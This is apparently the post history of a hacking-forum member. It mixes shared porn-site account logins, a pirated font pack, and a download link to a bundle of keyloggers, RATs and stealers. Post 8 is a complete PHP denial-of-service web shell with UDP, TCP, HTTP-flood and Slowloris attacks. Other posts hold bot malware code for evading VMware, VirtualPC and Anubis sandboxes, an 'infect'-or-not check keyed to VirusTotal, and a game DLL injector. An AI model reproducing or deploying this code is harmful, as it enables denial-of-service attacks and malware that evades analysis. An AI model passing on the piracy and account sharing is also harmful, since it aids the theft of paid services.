io.kent

Active Members
  • Posts: 2325
  • Days Won: 21

Everything posted by io.kent

  1. Please stop changing the passwords, so that more people can use them!
  2. PHP Code:
  3. We don't need drones, lazy people, and house painters. Where did you hear about RsT? Do you have a sister? Grandparents?? Wealth?? Underworld connections?? That's about it! On topic: enjoy your stay, what's your trade??
  4. Done! Lucius
  5. Edit : Babes + Twistys + Digital Playground! http://members.babes.com/
  6. pr0n keywords: http://pastebin.com/raw.php?i=bqEzNzpS // P.S.: stop pasting thousands of porn words here. Also, this has no place in the programming category.
  7. It was to be expected, and now they're going to make us pay, the pissants!
  8. <?php if(isset($_GET['method'])) { $bytes = 65000; /* * 65000 bytes is the around max packet size in * TCP and UDP * * lower ths to be secretive about the shell being on * the web server - you will have less chance of the * outbound packets being caught. */ if(empty($_GET['ip']) || empty($_GET['port']) || empty($_GET['length'])) { exit("You've forgotten something."); } if($_GET['method'] == "udp") { ignore_user_abort(true); set_time_limit(0); ob_start(); echo "Attack sent!"; $s = ob_get_length(); header("Content-Length: {$s}"); header("Content-Encoding: none"); header("Connection: close"); ob_end_flush(); ob_flush(); flush(); if(session_id()) session_write_close(); $n = 0; $packet = ''; do { switch($n) { case 0: $packet .= 'A'; break; case 1: $packet .= 'S'; break; case 2: $packet .= 'D'; break; case 3: $packet .= 'A'; break; } $n++; if($n == 4) $n = 0; } while(strlen($packet) != $bytes); $running = true; $runFor = strtotime('now') + $_GET['length']; do { if(strtotime('now') > $runFor) { $running = false; } $sock = @fsockopen("udp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10); if($sock) { fwrite($sock, $packet); fclose($sock); } else { $sock = @fsockopen("udp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10); fwrite($sock, $packet); } } while($running == true); } elseif($_GET['method'] == "slowloris") { ignore_user_abort(true); set_time_limit(0); ob_start(); echo "Attack sent!"; $s = ob_get_length(); header("Content-Length: {$s}"); header("Content-Encoding: none"); header("Connection: close"); ob_end_flush(); ob_flush(); flush(); if(session_id()) session_write_close(); $header = array(); $header[] = "GET / HTTP/1.1"; $header[] = "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7"; $header[] = "Host: {$_GET['ip']}"; $header[] = "Keep-Alive: 900"; $header[] = "Content-Length: " . 
mt_rand(100000, 1000000); $header[] = "Connection: keep-alive"; $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr); if($sock) { fwrite($sock, implode("\r\n", $header)); $running = false; $runFor = strtotime('now') + $_GET['length']; do { if(strtotime('now') > $runFor) { $running = false; } if($sock) { fwrite($sock, '.'); sleep(3); } else { $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr); fwrite($sock, implode("\r\n", $header)); } } while($running == true); } } elseif($_GET['method'] == "tcp") { ignore_user_abort(true); set_time_limit(0); ob_start(); echo "Attack sent!"; $s = ob_get_length(); header("Content-Length: {$s}"); header("Content-Encoding: none"); header("Connection: close"); ob_end_flush(); ob_flush(); flush(); if(session_id()) session_write_close(); $n = 0; $packet = ''; do { switch($n) { case 0: $packet .= 'A'; break; case 1: $packet .= 'S'; break; case 2: $packet .= 'D'; break; case 3: $packet .= 'A'; break; } $n++; if($n == 4) $n = 0; } while(strlen($packet) != $bytes); $running = true; $runFor = strtotime('now') + $_GET['length']; do { if(strtotime('now') > $runFor) { $running = false; } $sock = @fsockopen("tcp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10); if($sock) { fwrite($sock, $packet); fclose($sock); } else { $sock = @fsockopen("tcp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10); fwrite($sock, $packet); } } while($running == true); } elseif($_GET['method'] == "http") { ignore_user_abort(true); set_time_limit(0); ob_start(); echo "Attack sent!"; $s = ob_get_length(); header("Content-Length: {$s}"); header("Content-Encoding: none"); header("Connection: close"); ob_end_flush(); ob_flush(); flush(); if(session_id()) session_write_close(); $header = array(); $header[] = "GET / HTTP/1.1"; $header[] = "Host: {$_GET['ip']}"; $header[] = "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7"; $header[] = "Keep-Alive: 300"; $header[] = "Content-Length: 
" . mt_rand(100000, 1000000); $header[] = "Connection: keep-alive"; $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr); if($sock) { fwrite($sock, implode("\r\n", $header)); $running = false; $runFor = strtotime('now') + $_GET['length']; do { if(strtotime('now') > $runFor) { $running = false; } if($sock) { fwrite($sock, '.'); fclose($sock); sleep(3); } else { $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr); fwrite($sock, implode("\r\n", $header)); } } while($running == true); } } } ?> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="author" content="ASDA"> <meta name="robots" content="noindex, nofollow"> <title> Private Denial-of-Service Shell | Created by ASDA | HackForums.net | </title> <style> html, body { height: 100%; cursor: none; background: #000; color: #66ff33; overflow: hidden; } h1 { text-align: center; font-size: 50px; } #barX { background: #66ff33; left: 0; top: 0; position: absolute; width: 1px; height: 100%; z-index: 1000; } #barY { background: #66ff33; left: 0; top: 0; position: absolute; width: 100%; height: 1px; z-index: 1000; } input { cursor: none; border: 1px solid #11ff00; margin-bottom: 20px; } form { width: 50px; margin: auto; } label { display: block; } iframe { display: none; visibility: hidden; } </style> </head> <body> <div id="barY"></div> <div id="barX"></div> <div id="doColours"></div> <form action="<?php echo $_SERVER["SCRIPT_NAME"]; ?>" method="GET"> <label for="ip">Host:</label> <input type="text" name="ip" id="ip"> <label for="port">Port:</label> <input type="text" name="port" id="port"> <label for="length">Length:</label> <input type="text" name="length" id="length"> <label for="method">Method:</label> <select name="method" id="method"> <option value="slowloris">Slowloris</option> <option value="udp">UDP Flood</option> <option value="tcp">TCP Flood</option> <option value="http">HTTP Flood</option> </select> <br><br> <input type="submit" value="ATTACK!"> </form> <div id="youtube"></div> 
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js"></script> <script type="text/javascript"> $(document).ready(function(){ var title = document.title; setInterval(function(){title = title.substring(1, title.length) + title.substring(0, 1);document.title = title;}, 300); $("body").bind('mousemove', function(evt) { $("#barY").css({ "top": evt.pageY + 10 + "px" }); $("#barX").css({ "left": evt.pageX + 10 + "px" }); }); var youtubea = new Array(); youtubea[0] = "<iframe src=\"https://youtube.com/embed/zeIjmvZZ_SQ?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[1] = "<iframe src=\"https://youtube.com/embed/-ieJtn73e1w?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[2] = "<iframe src=\"https://youtube.com/embed/w1bRniqs774?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[3] = "<iframe src=\"https://youtube.com/embed/GqUN76-_Djg?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[4] = "<iframe src=\"https://youtube.com/embed/UDzNq1s7dAE?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[5] = "<iframe src=\"https://youtube.com/embed/DC9xwwmyS70?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[6] = "<iframe src=\"https://youtube.com/embed/liYyEqlvG1Y?autoplay=1#t=17s\" frameborder=\"0\"></iframe>"; youtubea[7] = "<iframe src=\"https://youtube.com/embed/K1VLaXoRRdk?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[8] = "<iframe src=\"https://youtube.com/embed/EZxeJV-G9kg?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[9] = "<iframe src=\"https://youtube.com/embed/JRwXku3nM1c?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[10] = "<iframe src=\"https://youtube.com/embed/oKpPd2hDrE4?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[11] = "<iframe src=\"https://youtube.com/embed/3Rd0LHQHjWg?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[12] = "<iframe src=\"https://youtube.com/embed/nuno2jOwOjo?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[13] = "<iframe 
src=\"https://youtube.com/embed/xLho8rMQpoI?autoplay=1\" frameborder=\"0\"></iframe>"; var rand = Math.floor(Math.random() * (youtubea.length + 1)); $('#youtube').html(youtubea[rand]); function doColour(a){setInterval(function(){for(var b=0;b<a.length;b++){$("#letter"+.css({color:colour[b]})}for(var b=0;b<colour.length;b++){colour[b-1]=colour[b]}colour[colour.length-1]=colour[-1]},50)}function initColours(a){var b="\x41\x53\x44\x41\x27\x73\x20\x50\x72\x69\x76\x61\x74\x65\x20\x53\x68\x65\x6C\x6C".split("");var c="<h1>";$.each(b,function(a,{c+="<span id='letter"+a+"'>"+b+"</span>"});c+="</h1>";$("#doColours").html(c);doColour(;var d=1;setInterval(function(){while(colour.length<b.length){colour=colour.concat(colour)}d=Math.floor(Math.random()*colours.length);colour=colours[d]},5e3)}colours=new Array;colours[0]=new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");colours[1]=new Array("#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00");colours[2]=new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00");colours[3]=new 
Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");colours[4]=new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");colours[5]=new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF");colours[6]=new Array("#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00");colour=colours[4];initColours(); }); </script> </body> </html>
  9. #!/usr/bin/python
     # coding: utf-8
     # Apache Log Extractor
     #
     # Chris John Riley
     # blog.c22.cc
     #
     # 27/07/2011
     #
     # Version: 0.4 Alpha
     #
     # PoC script... use at your own risk...
     #
     # 0.1 Initial Version
     # 0.2 Added wordlist support
     # 0.3 Added verbose, filter ... directories
     # 0.4 Added Basic Auth username extraction where present

     import sys, os, re

     # Banner text (the ASCII-art title is not reproduced here)
     logo = '''
      [\x1B[34;40mv0.4\x1B[0m]
      _/ Apache Log Extractor \x1B[34;40m?\x1B[0m
      _/ ChrisJohnRiley \x1B[34;40m?\x1B[0m
      _/ blog.c22.cc \x1B[34;40m?\x1B[0m\n'''

     def main():
         if len(sys.argv) < 2:
             print(logo)
             print(" [\x1B[34;40m!\x1B[0m] Use " + sys.argv[0] + " log_file.log \n [\x1B[34;40m!\x1B[0m] Use -v for verbose mode")
             sys.exit(1)
         else:
             print(logo)
             print(" [\x1B[34;40m \x1B[0m] Analysing the log file....\n")

         logfile = sys.argv[1]
         outfile = sys.argv[1] + ".output"
         wordfile = sys.argv[1] + ".wordlist"
         userfile = sys.argv[1] + ".users"

         # Verbose mode is requested with -v as the second argument;
         # always define the flag so later checks cannot hit an unset name
         verbose = len(sys.argv) > 2 and "-v" in sys.argv[2]
         if verbose:
             print(" [\x1B[34;40m+\x1B[0m] Verbose mode active\n")

         # Refuse to overwrite the results of an earlier run
         if os.path.exists(outfile):
             print(" [\x1B[34;40m!\x1B[0m] Output file already exists \n [\x1B[34;40m!\x1B[0m] Exiting!\n")
             sys.exit()

         try:
             inputfile_handle = open(logfile, 'r')
             outputfile_handle = open(outfile, 'w')
             wordfile_handle = open(wordfile, 'w')
         except IOError:
             print(" [\x1B[34;40m!\x1B[0m] Failed to open input/output files \n [\x1B[34;40m!\x1B[0m] Exiting!\n")
             sys.exit(1)

         # Request method followed by the requested path
         pattern = re.compile(r'(GET|POST)\s(.+?)\s', re.IGNORECASE)

         # Scan the logfile and extract the required sections
         matches = []    # requested paths
         matches2 = []   # basic auth usernames
         unique = []
         ValidIpAddressRegex = r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$"

         for line in inputfile_handle:
             working_line = re.search(pattern, line)
             working_line2 = ""
             # Fields before the [timestamp] are: host, ident, authuser
             small = line.split("[")
             small = small[0].split(" ")
             if (len(small) > 2) and small[2] != "-" and small[2] != "":
                 if re.match(ValidIpAddressRegex, small[0]):
                     working_line2 = small[2]
             if working_line:
                 matches.append(working_line.group(2))
             if working_line2:
                 matches2.append(working_line2)

         print(" [\x1B[34;40m \x1B[0m] Extracting URLs from logfile : " + logfile + "\n")
         if verbose:
             print("\n")

         for m in matches:
             # .../ match ignores incomplete paths in logfile
             if (m not in unique) and m != "*" and (".../" not in m):
                 unique.append(m)
                 if verbose:
                     print(" [\x1B[34;40m \x1B[0m] Extracted URL :  " + m)
                 outputfile_handle.write(m + '\n')

         if verbose:
             print("\n")
         print(" [\x1B[34;40m \x1B[0m] Extracting directory names from logfile\n")

         uniqueword = []
         for w in unique:
             word = w.split('?')        # Strip off parameters
             word = word[0].split('/')  # Extract directory names
             for x in word[0:-1]:
                 if (x not in uniqueword) and x != "" and ("..." not in x):
                     uniqueword.append(x)
                     if verbose:
                         print(" [\x1B[34;40m \x1B[0m] Extracted Word :  " + x)
                     wordfile_handle.write(x + '\n')

         if verbose:
             print("\n")
         print(" [\x1B[34;40m \x1B[0m] Extracting basic auth usernames from logfile : " + logfile + "\n")

         unique2 = []
         for m in matches2:
             if (m not in unique2) and m != " ":
                 unique2.append(m)
                 if verbose:
                     print(" [\x1B[34;40m \x1B[0m] Extracted basic auth username :  " + m)

         # The .users file is only created when usernames were found
         if unique2:
             try:
                 userfile_handle = open(userfile, 'w')
                 for each in unique2:
                     userfile_handle.write(each + '\n')
                 userfile_handle.close()
             except IOError:
                 print(" [\x1B[34;40m!\x1B[0m] Failed to open input/output files \n [\x1B[34;40m!\x1B[0m] Exiting!\n")
                 sys.exit(1)

         # Close files
         outputfile_handle.close()
         inputfile_handle.close()
         wordfile_handle.close()

         if verbose:
             print("\n")
         print(" [\x1B[34;40m+\x1B[0m] Extracted paths to : \x1B[34;40m" + outfile + "\x1B[0m [" + str(len(unique)) + "]\n")
         print(" [\x1B[34;40m+\x1B[0m] Extracted directory names to : \x1B[34;40m" + wordfile + "\x1B[0m [" + str(len(uniqueword)) + "]\n")
         if unique2:
             print(" [\x1B[34;40m+\x1B[0m] Extracted basic auth usernames to : \x1B[34;40m" + userfile + "\x1B[0m [" + str(len(unique2)) + "]\n")
         print("\n [\x1B[34;40m \x1B[0m] Thanks for flying \x1B[34;40mC22\x1B[0m airways: Your ticket to the skies!\n")

     if __name__ == "__main__":
         main()
  10. #NoTrayIcon
      If Not @ERROR Or Not $a_Call[0] Then Return SetError(2, 0, '')
      Return DllStructGetData($a, 1)
      EndFunc ;==>_Base64Decode
      Func ABOUT()
          MsgBox(262144, "", " CODED BY CELTIC88 " & @CRLF & @CRLF & " SKYP : CELTIC906 " & @CRLF & @CRLF & " DEVPOINT()", 0, $CREATGUI)
      EndFunc ;==>ABOUT
  11. Visual Basic Option Explicit Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" ( ByVal hKey As Long , ByVal lpSubKey As String , phkResult As Long ) As Long Private Declare Function RegCloseKey Lib "advapi32.dll" ( ByVal hKey As Long ) As Long Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" ( ByVal hKey As Long , ByVal lpValueName As String , ByVal lpReserved As Long , lpType As Long , lpData As Any, lpcbData As Long ) As Long Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long ) Public Function VirusTotal() As String If WinProdKey = "GC8X9-9Y376-BMTFR-T3Q63-R969Q" Then MsgBox "virustotal" End Else MsgBox "infect" End If End Function Public Function WinProdKey() As String Dim lhKey As Long Dim bvBuffer(163) As Byte Dim vCharset As Variant Dim bvChar(23) As Byte Dim i As Long Dim j As Long Dim lCur As Long If RegOpenKey(&H80000002, "SOFTWARE\MICROSOFT\Windows NT\CurrentVersion" , lhKey) = 0& Then If RegQueryValueEx(lhKey, "DigitalProductId" , 0, 3, bvBuffer(0), 164) = 0 Then Call CopyMemory(bvBuffer(0), bvBuffer(52), &HF) vCharset = Array( _ "B" , "C" , "D" , "F" , "G" , "H" , "J" , "K" , "M" , "P" , "Q" , "R" , _ "T" , "V" , "W" , "X" , "Y" , "2" , "3" , "4" , "6" , "7" , "8" , "9" ) For i = 0 To 23 bvChar(i) = Asc(vCharset(i)) Next For i = 24 To 0 Step -1 lCur = 0 For j = 14 To 0 Step -1 lCur = lCur * 256 Xor bvBuffer(j) bvBuffer(j) = Int(lCur / 24) lCur = lCur Mod 24 Next WinProdKey = vCharset(lCur) & WinProdKey If i Mod 5 = 0 And i <> 0 Then WinProdKey = "-" & WinProdKey Next End If Call RegCloseKey(lhKey) End If End Function
  12. Probably, but for the most part they are all good!
  13. What sets this one apart from every other font pack you've seen is that these fonts are absolutely the cream of the crop. Most of these retail at a couple of hundred bucks apiece, which probably puts this whole collection well over the $50,000 mark. This is -- by far -- the most expensive pirated "Fonts". The most expensive ones are scene releases by the font group TYPO, while the folder 'Font.Flood-Mixed.Fonts-all.the.world' has 1,276 individual fonts, all neatly separated in categories. Some of the scene releases also include original, retail PDF manuals and interesting goodies. Download : Share-Online - dl/5WBGCWTMZYX
  14. What a thug's heart you have, and a priest's talk, hehehe. I'll add the accounts this evening; at the moment I'm travelling. To be continued... Edit: Brazzer!
  15. 1) Antiviruses and Firewall 2) crypters 3) DOS IRC 4) Dosers 5) Downloaders 6) Keyloggers 7) Other 8) pass stealers 9) RATs 10) stealer Download : https://disk.yandex.com/public/?hash=/brZCYweZdji80E7W3NHUeJ%2B1/5ai0zPimQ%2BulVk4pU%3D Use a sandbox!
  16. #include "../Headers/includes.h" #include "../Headers/functions.h" #ifndef NO_ANTIVM DWORD __forceinline IsInsideVPC_exceptionFilter(LPEXCEPTION_POINTERS ep) { PCONTEXT ctx = ep->ContextRecord; ctx->Ebx = -1; // Not running VPC ctx->Eip += 4; // skip past the "call VPC" opcodes return EXCEPTION_CONTINUE_EXECUTION; } bool DetectVPC() { bool bVPCIsPresent = FALSE; __try { _asm push ebx _asm mov ebx, 0 // It will stay ZERO if VPC is running _asm mov eax, 1 // VPC function number _asm __emit 0Fh _asm __emit 3Fh _asm __emit 07h _asm __emit 0Bh _asm test ebx, ebx _asm setz [bVPCIsPresent] _asm pop ebx } __except(IsInsideVPC_exceptionFilter(GetExceptionInformation())) { } #ifdef DEBUG if (bVPCIsPresent==TRUE) DebugMsg("Bot is under VPC !"); else DebugMsg("Bot is not running under VPC !"); #endif return bVPCIsPresent; } bool DetectVMWare() { bool bVMWareIsPresent = TRUE; __try { __asm { push edx push ecx push ebx mov eax, 'VMXh' mov ebx, 0 // any value but not the MAGIC VALUE mov ecx, 10 // get VMWare version mov edx, 'VX' // port number in eax, dx // read port // on return EAX returns the VERSION cmp ebx, 'VMXh' // is it a reply from VMWare? 
setz [bVMWareIsPresent] // set return value pop ebx pop ecx pop edx } } __except(EXCEPTION_EXECUTE_HANDLER) { bVMWareIsPresent = FALSE; } #ifdef DEBUG if (bVMWareIsPresent==TRUE) DebugMsg("Bot is under VMWare !"); else DebugMsg("Bot is not running under VMWare !"); #endif return bVMWareIsPresent; } bool DetectAnubis() { char szBotFile[MAX_PATH]; bool bAnubisIsPresent = FALSE; if (strstr(szBotFile, "C:\\InsideTm\\")) bAnubisIsPresent = TRUE; #ifdef DEBUG if (bAnubisIsPresent==TRUE) DebugMsg("Bot is running under Anubis !"); else DebugMsg("Bot is not running under Anubis !"); #endif return bAnubisIsPresent; } bool IsProcessRunningUnderVM() { bool bVMWare; bool bVPC; bool bAnubis; bVMWare = DetectVMWare(); bVPC = DetectVPC(); bAnubis = DetectAnubis(); if (bVPC==TRUE || bVMWare==TRUE || bAnubis==TRUE) return TRUE; return FALSE; } #endif
  17. import java.io.IOException;
      import java.net.HttpURLConnection;
      import java.net.URL;
      import java.util.Scanner;

      public class RedirectLocationScanner {

          public static void main(final String[] args) throws IOException {
              String urlStr = null;
              // Take the URL from the command line, otherwise prompt for it
              if (!(args.length == 1)) {
                  Scanner scan = new Scanner(System.in);
                  System.out.println("URL?");
                  urlStr = scan.nextLine();
                  scan.close();
              } else {
                  urlStr = args[0];
              }
              if (!urlStr.startsWith("http://")) {
                  urlStr = "http://" + urlStr;
              }
              URL url = new URL(urlStr);
              // Do not follow the redirect, so its Location header can be read
              HttpURLConnection.setFollowRedirects(false);
              String redirectLoc = url.openConnection().getHeaderField("Location");
              if (redirectLoc == null) {
                  System.out.println("No redirect.");
              } else {
                  System.out.println("real URL: " + redirectLoc);
              }
          }
      }

      package scanner;

      import java.io.BufferedReader;
      import java.io.IOException;
      import java.io.InputStreamReader;
      import java.net.HttpURLConnection;
      import java.net.URL;
      import java.net.URLConnection;
      import java.util.Scanner;

      public class LinkScanner {

          // Hosts treated as ad/interstitial link services
          private static final String[] adServiceStrings = { "adf.ly", "adfoc.us",
                  "any.gs", "tinylinks.co", "linkbucks.com", "yyv.co", "miniurls.co",
                  "qqc.co", "whackyvidz.com", "ultrafiles.net", "dyo.gs",
                  "megaline.co", "uberpicz.com", "linkgalleries.net", "qvvo.com",
                  "urlbeat.net", "seriousfiles.com", "zxxo.net", "ugalleries.net",
                  "picturesetc.net" };

          private static final String USAGE = "java -jar scanner.jar <URL>";

          public static void main(String[] args) {
              try {
                  if (args.length == 1) {
                      System.out.println("Target URL: ");
                      scanAndPrint(args[0]);
                  } else if (args.length == 0) {
                      Scanner scan = new Scanner(System.in);
                      System.out.println("URL?");
                      String url = scan.nextLine();
                      scanAndPrint(url);
                  } else {
                      System.out.println(USAGE);
                  }
              } catch (IOException e) {
                  System.err.println(e.getMessage());
              }
          }

          private static void scanAndPrint(String string) throws IOException {
              System.out.println("Scanning ...");
              String target = new LinkScanner().scan(string);
              if (target != null) {
                  System.out.println("Target URL: ");
                  System.out.println(target);
              } else {
                  System.err.println("No target URL found");
              }
          }

          // Returns the destination behind a redirect or ad link, or null if none is found
          public String scan(String urlStr) throws IOException {
              if (!urlStr.startsWith("http://")) {
                  urlStr = "http://" + urlStr;
              }
              URL url = new URL(urlStr);
              HttpURLConnection.setFollowRedirects(false);
              if (isAdServiceLink(urlStr)) {
                  return handleAdLink(url);
              } else {
                  return handleRedirect(url);
              }
          }

          private boolean isAdServiceLink(String urlStr) {
              for (String str : adServiceStrings) {
                  if (urlStr.contains(str)) {
                      return true;
                  }
              }
              return false;
          }

          // Plain HTTP redirect: the destination is in the Location header
          private String handleRedirect(URL url) throws IOException {
              return url.openConnection().getHeaderField("Location");
          }

          // Ad page: the destination is embedded in a JavaScript variable in the body
          private String handleAdLink(URL url) throws IOException {
              URLConnection urlc = url.openConnection();
              urlc.addRequestProperty("user-agent", "Firefox");
              BufferedReader in = null;
              try {
                  in = new BufferedReader(
                          new InputStreamReader(urlc.getInputStream()));
                  String line;
                  while ((line = in.readLine()) != null) {
                      if (line.contains("var zzz =")) {
                          return extractADFlyURL(line);
                      }
                      if (line.contains("var click_url =")
                              && !line.contains("//var click_url =")) {
                          return extractADFocURL(line);
                      }
                      if (line.contains("Lbjs.TargetUrl =")) {
                          return extractLinkBucksURL(line);
                      }
                  }
                  throw new IOException("Unable to find target URL in link");
              } finally {
                  if (in != null) {
                      in.close();
                  }
              }
          }

          private String extractLinkBucksURL(String line) {
              String go = line.split("'")[1];
              return go;
          }

          private String extractADFocURL(String line) throws IOException {
              String go = line.split("\"")[1];
              return go;
          }

          private String extractADFlyURL(String line) throws IOException {
              String go = line.split("'")[1];
              String redirect = handleRedirect(new URL("http://adf.ly" + go));
              if (redirect == null) {
                  return go;
              }
              return redirect;
          }
      }

      Mostly valid for: adfoc, Linkbucks, Adfly
  18. #AutoIt3Wrapper_UseUpx=n #AutoIt3Wrapper_UseX64=n #RequireAdmin Global Const $gui_event_close = -3 Global Const $gui_event_minimize = -4 Global Const $gui_event_restore = -5 Global Const $gui_event_maximize = -6 Global Const $gui_event_primarydown = -7 Global Const $gui_event_primaryup = -8 Global Const $gui_event_secondarydown = -9 Global Const $gui_event_secondaryup = -10 Global Const $gui_event_mousemove = -11 Global Const $gui_event_resized = -12 Global Const $gui_event_dropped = -13 Global Const $gui_rundefmsg = "GUI_RUNDEFMSG" Global Const $gui_avistop = 0 Global Const $gui_avistart = 1 Global Const $gui_aviclose = 2 Global Const $gui_checked = 1 Global Const $gui_indeterminate = 2 Global Const $gui_unchecked = 4 Global Const $gui_dropaccepted = 8 Global Const $gui_nodropaccepted = 4096 Global Const $gui_acceptfiles = $gui_dropaccepted Global Const $gui_show = 16 Global Const $gui_hide = 32 Global Const $gui_enable = 64 Global Const $gui_disable = 128 Global Const $gui_focus = 256 Global Const $gui_nofocus = 8192 Global Const $gui_defbutton = 512 Global Const $gui_expand = 1024 Global Const $gui_ontop = 2048 Global Const $gui_fontitalic = 2 Global Const $gui_fontunder = 4 Global Const $gui_fontstrike = 8 Global Const $gui_dockauto = 1 Global Const $gui_dockleft = 2 Global Const $gui_dockright = 4 Global Const $gui_dockhcenter = 8 Global Const $gui_docktop = 32 Global Const $gui_dockbottom = 64 Global Const $gui_dockvcenter = 128 Global Const $gui_dockwidth = 256 Global Const $gui_dockheight = 512 Global Const $gui_docksize = 768 Global Const $gui_dockmenubar = 544 Global Const $gui_dockstatebar = 576 Global Const $gui_dockall = 802 Global Const $gui_dockborders = 102 Global Const $gui_gr_close = 1 Global Const $gui_gr_line = 2 Global Const $gui_gr_bezier = 4 Global Const $gui_gr_move = 6 Global Const $gui_gr_color = 8 Global Const $gui_gr_rect = 10 Global Const $gui_gr_ellipse = 12 Global Const $gui_gr_pie = 14 Global Const $gui_gr_dot = 16 Global Const 
$gui_gr_pixel = 18 Global Const $gui_gr_hint = 20 Global Const $gui_gr_refresh = 22 Global Const $gui_gr_pensize = 24 Global Const $gui_gr_nobkcolor = -2 Global Const $gui_bkcolor_default = -1 Global Const $gui_bkcolor_transparent = -2 Global Const $gui_bkcolor_lv_alternate = -33554432 Global Const $gui_ws_ex_parentdrag = 1048576 If FileExists("hack.ini") Then Else MsgBox(16, "Dll Injector", "hack.ini Bulunamadi Lütfen Dizine Ekleyiniz", 5) Exit EndIf $InjectEdilecekExeTitle = IniRead("hack.ini", "dll", "Procces", "default") $dllyeri = IniRead("hack.ini", "halo", "Dll", "default") GUICreate("Dll Injector", 275, 100) GUISetBkColor(16777215) GUICtrlCreateLabel("KO.exe:", 10, 10, 50, 17) $i_processname = GUICtrlCreateInput($InjectEdilecekExeTitle, 65, 10, 200, 21) GUICtrlCreateLabel("DLL:", 10, 40, 50, 17) $i_dllpath = GUICtrlCreateInput($dllyeri, 65, 40, 150, 21) $b_searchdll = GUICtrlCreateButton("...", 225, 40, 40, 25) $r_auto = GUICtrlCreateRadio("Otomatik", 10, 75, 75, 17) GUICtrlSetState(-1, $gui_checked) $r_man = GUICtrlCreateRadio("Elle", 130, 75, 55, 17) $b_inject = GUICtrlCreateButton("Injectle", 190, 70, 75, 25) GUICtrlSetState(-1, $gui_disable) GUISetState() $injected = False Do $msg = GUIGetMsg() Switch $msg Case $b_searchdll GUICtrlSetData($i_dllpath, FileOpenDialog("Dll", @HomeDrive, "Dynamic Link Library (*.dll)", 3)) Case $r_auto GUICtrlSetState($b_inject, $gui_disable) Case $r_man GUICtrlSetState($b_inject, $gui_enable) Case $b_inject _injectdll(ProcessExists(GUICtrlRead($i_processname)), GUICtrlRead($i_dllpath)) _message(@error) EndSwitch If BitAND(GUICtrlRead($r_auto), $gui_checked) AND NOT $injected Then $processid = ProcessExists(GUICtrlRead($i_processname)) If $processid > 0 Then _injectdll($processid, GUICtrlRead($i_dllpath)) _message(@error) $injected = True EndIf EndIf 